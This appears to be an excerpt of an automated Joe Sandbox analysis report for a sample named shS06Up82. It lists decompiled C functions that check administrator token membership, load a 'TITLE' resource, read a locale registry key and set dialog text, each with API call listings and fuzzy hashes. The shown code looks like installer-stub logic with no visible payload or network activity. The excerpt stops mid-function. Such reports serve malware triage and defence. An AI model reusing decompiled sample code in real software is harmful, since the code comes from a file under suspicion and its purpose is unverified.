                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E003E18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                      				_t23 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                      				_t25 =  *0x3e8128; // 0x2
                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					return E003E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E003E17EE( &_v20) != 0) {
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                      						 *0x3e8128 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0x3e8128 = 1;
                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x003e18a3
                                                                                                                                                                                                      0x003e18a3
                                                                                                                                                                                                      0x003e18ab
                                                                                                                                                                                                      0x003e18b2
                                                                                                                                                                                                      0x003e18b5
                                                                                                                                                                                                      0x003e18be
                                                                                                                                                                                                      0x003e18c0
                                                                                                                                                                                                      0x003e18c6
                                                                                                                                                                                                      0x003e18c7
                                                                                                                                                                                                      0x003e18ca
                                                                                                                                                                                                      0x003e18cf
                                                                                                                                                                                                      0x003e19c9
                                                                                                                                                                                                      0x003e19d8
                                                                                                                                                                                                      0x003e19d8
                                                                                                                                                                                                      0x003e18df
                                                                                                                                                                                                      0x003e19b8
                                                                                                                                                                                                      0x003e19bd
                                                                                                                                                                                                      0x003e19bf
                                                                                                                                                                                                      0x003e19bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e19bd
                                                                                                                                                                                                      0x003e18fa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1912
                                                                                                                                                                                                      0x003e19aa
                                                                                                                                                                                                      0x003e19ad
                                                                                                                                                                                                      0x003e19b3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1927
                                                                                                                                                                                                      0x003e1927
                                                                                                                                                                                                      0x003e1932
                                                                                                                                                                                                      0x003e1936
                                                                                                                                                                                                      0x003e19a9
                                                                                                                                                                                                      0x003e19a9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e19a9
                                                                                                                                                                                                      0x003e194c
                                                                                                                                                                                                      0x003e19a2
                                                                                                                                                                                                      0x003e19a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e196e
                                                                                                                                                                                                      0x003e1970
                                                                                                                                                                                                      0x003e1999
                                                                                                                                                                                                      0x003e199c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e199c
                                                                                                                                                                                                      0x003e1972
                                                                                                                                                                                                      0x003e1972
                                                                                                                                                                                                      0x003e1975
                                                                                                                                                                                                      0x003e1984
                                                                                                                                                                                                      0x003e1985
                                                                                                                                                                                                      0x003e198a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e198c
                                                                                                                                                                                                      0x003e1991
                                                                                                                                                                                                      0x003e1996
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1996
                                                                                                                                                                                                      0x003e194c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003E18DD), ref: 003E181A
                                                                                                                                                                                                        • Part of subcall function 003E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003E182C
                                                                                                                                                                                                        • Part of subcall function 003E17EE: AllocateAndInitializeSid.ADVAPI32(003E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E18DD), ref: 003E1855
                                                                                                                                                                                                        • Part of subcall function 003E17EE: FreeSid.ADVAPI32(?,?,?,?,003E18DD), ref: 003E1883
                                                                                                                                                                                                        • Part of subcall function 003E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,003E18DD), ref: 003E188A
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003E18EB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 003E18F2
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 003E190A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 003E1918
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 003E192C
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 003E1944
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1964
                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 003E197A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 003E199C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 003E19A3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003E19AD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                      • Opcode ID: ce8ea5167f17d8420f9cb2235e8029f9db3657131150507326f0952c8430a4c1
                                                                                                                                                                                                      • Instruction ID: 564dfa0dce1f557878e0ade4ad8c0cb8109ea46e3dec301a519b885ddaa240b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce8ea5167f17d8420f9cb2235e8029f9db3657131150507326f0952c8430a4c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1314F71A00299AFDB229FA6DC88ABFBBBCFF04710F110629F545D6191D7309D05DB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E003E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x003e4699
                                                                                                                                                                                                      0x003e469b
                                                                                                                                                                                                      0x003e46a9
                                                                                                                                                                                                      0x003e46af
                                                                                                                                                                                                      0x003e46b4
                                                                                                                                                                                                      0x003e46bc
                                                                                                                                                                                                      0x003e46f9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e46f9
                                                                                                                                                                                                      0x003e46d9
                                                                                                                                                                                                      0x003e46dd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e46e5
                                                                                                                                                                                                      0x003e46ef
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e46f5
                                                                                                                                                                                                      0x003e46ff

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: TITLE$cent
                                                                                                                                                                                                      • API String ID: 3370778649-3553536280
                                                                                                                                                                                                      • Opcode ID: b0314a63322fca406ef2265118821ca9e7bf1caa78e3fefa268a4692ddaf0989
                                                                                                                                                                                                      • Instruction ID: b403c065b10f6c4f6d200a1d7f35844cf058d2b2418c14e79f7f44d91c6fd48c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0314a63322fca406ef2265118821ca9e7bf1caa78e3fefa268a4692ddaf0989
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701F9362407907BE3321BA65C8CF2B3E2CDBCAF62F054214FA49AB1C0C9719C4082B2
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E681F(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                      				_t19 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                      				_t41 =  *0x3e81d8; // 0x0
                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                      					 *0x3e81d8 = 0;
                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      						_t41 =  *0x3e81d8; // 0x0
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0x3e1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                      								if(E003E66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                      										 *0x3e81d8 = _t41;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t18 =  &_v8; // 0x3e463b
                                                                                                                                                                                                      				return E003E6CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x003e681f
                                                                                                                                                                                                      0x003e682a
                                                                                                                                                                                                      0x003e6831
                                                                                                                                                                                                      0x003e6836
                                                                                                                                                                                                      0x003e683c
                                                                                                                                                                                                      0x003e683e
                                                                                                                                                                                                      0x003e6848
                                                                                                                                                                                                      0x003e6851
                                                                                                                                                                                                      0x003e685d
                                                                                                                                                                                                      0x003e6864
                                                                                                                                                                                                      0x003e6876
                                                                                                                                                                                                      0x003e693a
                                                                                                                                                                                                      0x003e693a
                                                                                                                                                                                                      0x003e687c
                                                                                                                                                                                                      0x003e687e
                                                                                                                                                                                                      0x003e6885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e68d6
                                                                                                                                                                                                      0x003e68f4
                                                                                                                                                                                                      0x003e6900
                                                                                                                                                                                                      0x003e6902
                                                                                                                                                                                                      0x003e690a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e690c
                                                                                                                                                                                                      0x003e690c
                                                                                                                                                                                                      0x003e691c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e691e
                                                                                                                                                                                                      0x003e6924
                                                                                                                                                                                                      0x003e692b
                                                                                                                                                                                                      0x003e6932
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e692b
                                                                                                                                                                                                      0x003e691c
                                                                                                                                                                                                      0x003e690a
                                                                                                                                                                                                      0x003e6885
                                                                                                                                                                                                      0x003e6876
                                                                                                                                                                                                      0x003e6940
                                                                                                                                                                                                      0x003e6951

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003E686E
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 003E68A7
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003E68CC
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,?,0000000C), ref: 003E68F4
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 003E6902
                                                                                                                                                                                                        • Part of subcall function 003E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,003E691A), ref: 003E6741
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                      • String ID: ;F>$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                      • API String ID: 3346862599-1716249293
                                                                                                                                                                                                      • Opcode ID: 3c38aac4ad6e9535de66726bd2639f202c3ef3f4c3106ad3eb961f90f1f27f18
                                                                                                                                                                                                      • Instruction ID: b2001789cda8929816d91a9b4e6d91a0b8f09d87a03439be0cb208423bd689d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c38aac4ad6e9535de66726bd2639f202c3ef3f4c3106ad3eb961f90f1f27f18
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE315431A402A8DFDB32CB52CC46BAA777CEB95798F010395E94DAA1C1D730AD858F52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                      			E003E17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                      							 *0x3ea288(0, _v24, _v28);
                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x003e17f6
                                                                                                                                                                                                      0x003e17fd
                                                                                                                                                                                                      0x003e1805
                                                                                                                                                                                                      0x003e180b
                                                                                                                                                                                                      0x003e180d
                                                                                                                                                                                                      0x003e1815
                                                                                                                                                                                                      0x003e1818
                                                                                                                                                                                                      0x003e1820
                                                                                                                                                                                                      0x003e1824
                                                                                                                                                                                                      0x003e182c
                                                                                                                                                                                                      0x003e1832
                                                                                                                                                                                                      0x003e1837
                                                                                                                                                                                                      0x003e1851
                                                                                                                                                                                                      0x003e1854
                                                                                                                                                                                                      0x003e185d
                                                                                                                                                                                                      0x003e1862
                                                                                                                                                                                                      0x003e186c
                                                                                                                                                                                                      0x003e1872
                                                                                                                                                                                                      0x003e1877
                                                                                                                                                                                                      0x003e187e
                                                                                                                                                                                                      0x003e187e
                                                                                                                                                                                                      0x003e1883
                                                                                                                                                                                                      0x003e1883
                                                                                                                                                                                                      0x003e185d
                                                                                                                                                                                                      0x003e188a
                                                                                                                                                                                                      0x003e188a
                                                                                                                                                                                                      0x003e18a2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003E18DD), ref: 003E181A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003E182C
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(003E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E18DD), ref: 003E1855
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,003E18DD), ref: 003E1883
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,003E18DD), ref: 003E188A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                      • Opcode ID: e2693d9d0158dd9eebf2895c084e6fa7a9f593a9ddfc0426f47e499fb6c7dd29
                                                                                                                                                                                                      • Instruction ID: e253aef19a74c9750e99c0769f4d2be5487a356d332931a1169288dc3cf2e80a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2693d9d0158dd9eebf2895c084e6fa7a9f593a9ddfc0426f47e499fb6c7dd29
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55119331E00259ABDB129FA5DC89ABEBB7CEF44711F110669FA06E62D0DA709D04CB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                      					_t24 = _a4;
                                                                                                                                                                                                      					E003E43D0(_t24, _t12);
                                                                                                                                                                                                      					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0x3e9404);
                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
